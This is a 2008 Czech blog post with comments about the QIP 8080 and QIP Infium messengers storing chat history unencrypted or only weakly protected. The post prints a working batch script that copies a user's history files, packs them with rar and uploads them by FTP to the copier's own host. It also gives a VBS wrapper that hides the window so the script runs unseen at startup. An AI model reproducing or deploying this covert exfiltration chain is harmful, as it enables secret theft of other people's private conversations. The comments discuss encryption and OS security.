Historie v QIP 8080 a QIP Infium 9020 - nezabezpečeno!
Po problémech které jsou poslední dobou častější a častější jsem se rozhodl začít využívat i jiné protokoly než icq. Nemůžu říci že jsem přešel na jabber, ale začal jsem ho používat ve stejné míře… S jabberem jsem se dostal také k IM qip infium – porovnával jsem a tady máte můj názor…
Porovnával jsem hlavně řešení historie.QIP 8080:
Ukládá historii do *.txt s tím, že log není vůbec šifrovaný, každý kdo si tedy zkopíruje soubory ze složky ( defaultně ):
C:\Program Files\QIP\Users\icq_cislo\History
… může pohodlně vidět veškeré vaše rozhovory! Přitom pro zkopírování stačí jednoduchý scritpík (dá-li se tomu tak říkat), který by mohl vypadat třebas takto:
copy "C:\Program Files\QIP\Users\icq_cislo\History\*.txt"
… spuštěný z flash disku během vteřiny „ukradne“ veškeré rozhovory, při malém vylepšení, které by mohlo vypadat takto:
copy "C:\Program Files\QIP\Users\204324253\History\*.txt"
rar a "%date%-%username%-%random%.rar" *.txt
ftp
open www.vas_hosting.cz 21
vas _hosting
heslo_pro_hosting
mput "*.rar"
disconnect
quit
… tento scriptik pro změnu může odeslat historii na vaše ftp, není řešen firewall! Když pak dáme takový skript do pospuštění, můžem ztropit dost problémů, proto to raději nedělejme… Při spuštění tohoto skriptu po startu windows nám na obrazovce problikne okno cmd, to můžem vyřešit supuštěním přes vbs soubor nejiný tomuto:
Set ws = Wscript.CreateObject("Wscript.Shell")
ws.Run "první_soubor.cmd", 0
A jak je na tom tedy historie uložená v pc IM qip infium?
Je to lepší, ale stále děsivé! Historie nejde číst v poznámkovém bloku jako u qip 8080, nemá koncovku *.txt ale *.qhf a najdeme ji (u win vista v defaultním nastavení) tady:
C:\Users\uzivatel_win\AppData\Roaming\QIP\Profiles\icq_cislo\History
Při pokusu oteřít soubor *.ghf v poznámkovém bloku budem zklamáni, ze změti znaků se dozvíme tak akorát nick a uin od kterého je historie logována… Když ale soubor s cizí historii načtem přes jakýkoliv účet u qip infium, historie bude krásně čitelná, z toho plyne míra zabezpečení! Je o něco větší než u 8080 ale stále limitující nulu – nejde mluvit o zabezpečení! Způsob „ukradení“ historie by byl téměř totožný s 8080…
To by bylo k historii – prozatím ji neukládám a ani to neplánuji, uvidíme časem třebas se v budoucnu něco změní…
Autor:  KdoSiOdJinud / Jan KuthanVydáno: 16.12.2008 14:55 Přečteno: 4725x |
.jpg)
Komentáře
Celé QIP Infium je nějaké podivné. S QIPem jsem neměl téměř žádný problém, byl rychlý a stabilní. Jenže jednoho jsem se už nepřihlásil, zaktualizoval jsem a pořád nic. Takže přišlo na řadu QIP Infium :-/ Při správě contact listu se děli podivné věci - chtěl jsem někoho přejmenovat, ale po relognutí jsem měl přejmenovaného někoho úplně jiného. Sám sebe jsem měl v kontaktech abych viděl jak mě uvidí ostatní přes QIP a najednou jsem v QIP Infium měl půlku lidí offline a vlastní icq stavy se zobrazovali u úplně jiného kontaktu, se kterým jsem normálně konverzoval.
Šifrované logy má i dnes však málokterý IM program a pořád je možné je šifrovat externím programem. Bezpečnost přístupu k počítači, nějaké automaticky spouštěné skripty na flashce, by pak měl řešit hlavně OS. Abys mohl něco bezpečně šifrovat, tak potřebuješ stejně nějaký klíč, nebo 2 klíče a jeden pak někde bezpečně uchovávat :-) A kdybys je měl zas v nějakém adresáři kam má přístup QIP aby Ti mohl historii zobrazit (dešifrovat) tak by skript na zkopírování logů a klíče byl jen o řádek delší :-) Pokud bys tedy chtěl mít klíč na externím disku, flašce, apod. tak Tě vyjde na stejno si je manuálně (de)šifrovat.